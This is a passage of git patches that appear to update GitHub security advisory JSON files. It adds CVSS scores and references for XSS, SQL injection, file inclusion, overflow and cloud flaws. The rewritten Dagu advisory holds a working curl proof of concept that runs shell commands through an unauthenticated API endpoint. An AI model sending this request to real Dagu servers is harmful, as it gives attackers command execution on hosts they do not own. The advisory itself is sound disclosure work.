"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json index 61cca68f9347e..600283669463d 100644 --- a/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json +++ b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pmgj-wpmq-6xx5", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24955" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Whizz Plugins whizz-plugins allows Reflected XSS.This issue affects Whizz Plugins: from n/a through <= 1.9.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json b/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json new file mode 100644 index 0000000000000..713c3e2275151 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qv8j-hgpc-vrq8", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2472" + ], + "details": "Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Amber" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2472" + }, + { + "type": "WEB", + "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-011" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T20:25:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json index 0c7963d6b7ddd..0ab746b310ee2 100644 --- a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json +++ b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r4m3-cm43-fxrj", - "modified": "2026-02-18T15:31:27Z", + "modified": "2026-02-20T21:31:20Z", "published": "2026-02-18T15:31:27Z", "aliases": [ "CVE-2026-2329" ], "details": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json b/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json new file mode 100644 index 0000000000000..c9305e8865a51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r62q-p7vv-vh53", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2853" + ], + "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. This affects the function sub_462E14 of the file /boafrm/formSysLog of the component System Log Configuration Endpoint. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2853" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/10" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347092" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347092" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754456" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T20:25:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json index 9f36ac3497bf5..bc631b5fdc5cc 100644 --- a/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json +++ b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v754-wvf3-33xx", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22372" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Isida isida allows PHP Local File Inclusion.This issue affects Isida: from n/a through <= 1.4.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json index fff849fc5b48c..680fbabad4dd1 100644 --- a/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json +++ b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v859-79r4-4vv5", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24959" ], "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JoomSky JS Help Desk js-support-ticket allows Blind SQL Injection.This issue affects JS Help Desk: from n/a through <= 3.0.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json index cc0af4ab5b99c..54bad9bca322d 100644 --- a/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json +++ b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vmwq-q997-3c46", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:21Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22362" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Photolia photolia allows PHP Local File Inclusion.This issue affects Photolia: from n/a through <= 1.0.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json index 9cb37fd2b1c65..28da835b79ca9 100644 --- a/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json +++ b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w246-2vcp-75v8", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:40Z", "aliases": [ "CVE-2026-27503" ], "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in admin/log.php via the search query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing attacker-supplied JavaScript to execute in the administrator's browser. This can enable session theft, administrative action forgery, or other browser-based compromise in the context of an admin user.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json b/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json new file mode 100644 index 0000000000000..c06ed9f12a507 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh2j-26j7-9728", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2473" + ], + "details": "Predictable bucket naming in Vertex AI Experiments in Google Cloud Vertex AI from version 1.21.0 up to (but not including) 1.133.0 on Google Cloud Platform allows an unauthenticated remote attacker to achieve cross-tenant remote code execution, model theft, and poisoning via pre-creating predictably named Cloud Storage buckets (Bucket Squatting).\n\nThis vulnerability was patched and no customer action is needed.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2473" + }, + { + "type": "WEB", + "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-012" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-340" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T20:25:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json index 953587e042e26..2fef22de5929b 100644 --- a/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wrqv-46c5-q67w", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22383" ], "details": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-639" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:37Z" diff --git a/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json index c819e34199f9c..1ce1871d939ac 100644 --- a/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json +++ b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x57h-c6qr-3m4q", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22376" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Parkivia parkivia allows PHP Local File Inclusion.This issue affects Parkivia: from n/a through <= 1.1.9.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:37Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json index de22b2120f16e..2d3dc6b78d2e7 100644 --- a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json +++ b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xpp8-qpcr-c3rg", - "modified": "2026-02-17T21:31:13Z", + "modified": "2026-02-20T21:31:20Z", "published": "2026-02-13T21:31:39Z", "aliases": [ "CVE-2026-2441" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html" }, + { + "type": "WEB", + "url": "https://github.com/huseyinstif/CVE-2026-2441-PoC/blob/main/poc.html" + }, { "type": "WEB", "url": "https://issues.chromium.org/issues/483569511" From ebf4870fbe5715529df352fe787dccafbc9ceb8a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:46:14 +0000 Subject: [PATCH 26/77] Publish GHSA-6qr9-g2xw-cw92 --- .../2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json b/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json index 00ecec9f8597e..a5d216178a5c5 100644 --- a/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json +++ b/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-6qr9-g2xw-cw92", - "modified": "2026-02-19T22:04:39Z", + "modified": "2026-02-20T21:44:24Z", "published": "2026-02-19T22:04:39Z", "aliases": [], "summary": "Dagu affected by unauthenticated RCE via inline DAG spec in default configuration", - "details": "### Summary\n\nDagu's default configuration ships with authentication completely disabled. The `POST /api/v2/dag-runs` endpoint accepts an inline YAML spec and executes its shell commands immediately — no credentials, no token, nothing. Any dagu instance reachable over the network is fully compromised by default. A second issue means that even with auth properly configured, operator-role users can still execute arbitrary commands by submitting inline specs through the same endpoint.\n\n### Details\n\n**Finding 1 — Unauthenticated RCE (default config)**\n\n`internal/service/app/config/loader.go:226` sets `AuthModeNone` as the default. With no auth mode configured, `internal/frontend/api/v2/handlers/api.go:520` returns nil from `requireExecute()` — all permission checks pass without a valid session.\n\nThe `POST /api/v2/dag-runs` endpoint accepts a `spec` field containing a full YAML DAG definition. The spec is loaded, the steps are parsed, and the commands execute immediately on the host. There is no validation of the spec content beyond YAML parsing.\n\nTested on `ghcr.io/dagu-org/dagu:latest` — the endpoint responds with a `dagRunId` and the command runs within milliseconds.\n\n**Finding 2 — Operator role privilege escalation (auth-enabled instances)**\n\n`internal/frontend/api/v2/handlers/dagruns.go:56` guards the dag-runs endpoint with `requireExecute()`. The operator role has `CanExecute=true` but `CanWrite=false` (`internal/auth/role.go:63-69`) — operators are supposed to run existing DAGs, not create new ones.\n\nBut submitting an inline spec to `POST /api/v2/dag-runs` is effectively a create-and-execute operation. The endpoint never calls `requireDAGWrite()`. So an operator can paste arbitrary shell commands into the spec field and execute them — the same result as admin — while being correctly blocked from `POST /api/v2/dags`. This applies even when authentication is fully enabled and correctly configured.\n\n**Finding 3 — Backtick command injection in step parameters**\n\n`internal/cmn/eval/substitute.go:57-78` evaluates backtick-delimited expressions in step parameter values by passing them to `sh -c`. There is no sanitization on parameter values before they reach this function. Any user who can trigger a DAG run with custom parameters can inject arbitrary commands via backtick substitution.\n\n### PoC\n\nFinding 1 — no credentials needed, works on any default install:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v2/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"name\":\"poc\",\"spec\":\"steps:\\n - name: rce\\n command: id > /tmp/pwned\\n\"}'\n\n# Response: {\"dagRunId\":\"\"}\n# /tmp/pwned contains: uid=1000(dagu) gid=1000(dagu) groups=1000(dagu)\n```\n\nTested and confirmed on the default Docker image with no configuration changes.\n\n### Impact\n\nEvery dagu deployment using default settings — which is every Docker deployment, every install following the documentation, and every instance without explicit `DAGU_AUTH_MODE` configuration — is fully compromised without credentials. An attacker with network access gets OS command execution as the dagu process user and access to everything the process can reach.\n\nFinding 2 means the problem doesn't fully go away by enabling auth. Operator-level accounts can still escalate to arbitrary command execution regardless of the auth configuration.", + "details": "### Summary\nDagu's default configuration ships with authentication disabled. The `POST /api/v2/dag-runs` endpoint accepts an inline YAML spec and executes its shell commands immediately with no credentials required — any dagu instance reachable over the network is fully compromised by default.\n\n### Details\n`internal/service/app/config/loader.go:226` sets `AuthModeNone` as the default. With no auth mode configured, `internal/frontend/api/v2/handlers/api.go:520` returns `nil` from `requireExecute()` — all permission checks pass without a valid session.\n\nThe `POST /api/v2/dag-runs` endpoint accepts a `spec` field containing a full YAML DAG definition. The spec is parsed and the commands execute immediately on the host with no validation beyond YAML parsing.\n\n### PoC\n```bash\ncurl -s -X POST http://TARGET:8080/api/v2/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"name\":\"poc\",\"spec\":\"steps:\\n - name: rce\\n command: id > /tmp/pwned\\n\"}'\n# Response: {\"dagRunId\":\"\"}\n# /tmp/pwned contains: uid=1000(dagu) gid=1000(dagu)\n```\nConfirmed on `ghcr.io/dagu-org/dagu:latest` with no configuration changes.\n\n### Impact\nEvery dagu deployment using default settings — every Docker deployment, every install following the documentation, every instance without explicit `DAGU_AUTH_MODE` configuration — is fully compromised without credentials. An attacker with network access gets OS command execution as the dagu process user.", "severity": [ { "type": "CVSS_V3", From 3c5089dd9bd9473bda8853ae151a7f61f7aa15dc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:49:56 +0000 Subject: [PATCH 27/77] Publish GHSA-8j8w-wwqc-x596 --- .../2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json b/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json index 5a873cecb5e2e..ee249eca92a28 100644 --- a/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json +++ b/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8j8w-wwqc-x596", - "modified": "2025-12-22T18:41:25Z", + "modified": "2026-02-20T21:48:11Z", "published": "2025-06-02T06:30:32Z", "aliases": [ "CVE-2025-49113" @@ -99,6 +99,10 @@ "type": "WEB", "url": "https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10" }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-49113" + }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-49113-roundcube-mitigation-script" From d19ea1e99c4dd88a4de5a5eef0ee09ba27e276bb Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:54:41 +0000 Subject: [PATCH 28/77] Publish GHSA-cxpw-2g23-2vgw --- .../GHSA-cxpw-2g23-2vgw.json | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json diff --git a/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json new file mode 100644 index 0000000000000..0c624b24b1508 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json @@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxpw-2g23-2vgw", + "modified": "2026-02-20T21:52:44Z", + "published": "2026-02-20T21:52:44Z", + "aliases": [ + "CVE-2026-27576" + ], + "summary": "OpenClaw: ACP prompt-size checks missing in local stdio bridge could reduce responsiveness with very large inputs", + "details": "## Vulnerability\n\nThe ACP bridge accepted very large prompt text blocks and could assemble oversized prompt payloads before forwarding them to `chat.send`.\n\nBecause ACP runs over local stdio, this mainly affects local ACP clients (for example IDE integrations) that send unusually large inputs.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.17`\n- Patched version: `2026.2.18` (planned next release)\n\n## Impact\n\n- Local ACP sessions may become less responsive when very large prompts are submitted\n- Larger-than-expected model usage/cost when oversized text is forwarded\n- No privilege escalation and no direct remote attack path in the default ACP model\n\n## Affected Components\n\n- `src/acp/event-mapper.ts`\n- `src/acp/translator.ts`\n\n## Remediation\n\n- Enforce a 2 MiB prompt-text limit before concatenation\n- Count inter-block newline separator bytes during pre-concatenation size checks\n- Keep final outbound message-size validation before `chat.send`\n- Avoid stale active-run session state when oversized prompts are rejected\n- Add regression tests for oversize rejection and active-run cleanup\n\n## Fix Commit(s)\n\n- `732e53151e8fbdfc0501182ddb0e900878bdc1e3`\n- `ebcf19746f5c500a41817e03abecadea8655654a`\n- `63e39d7f57ac4ad4a5e38d17e7394ae7c4dd0b9c`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.17" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxpw-2g23-2vgw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/63e39d7f57ac4ad4a5e38d17e7394ae7c4dd0b9c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/8ae2d5110f6ceadef73822aa3db194fb60d2ba68" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/ebcf19746f5c500a41817e03abecadea8655654a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:52:44Z", + "nvd_published_at": null + } +} \ No newline at end of file From a8170f74a7a86d90b94b600d04b96c97493d693d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 22:21:27 +0000 Subject: [PATCH 29/77] Publish Advisories GHSA-hmh4-3xvx-q5hr GHSA-m7jm-9gc2-mpf2 --- .../2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json | 8 ++++++-- .../2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json | 8 ++++++-- 2 files changed, 12 insertions(+), 4 deletions(-) diff --git 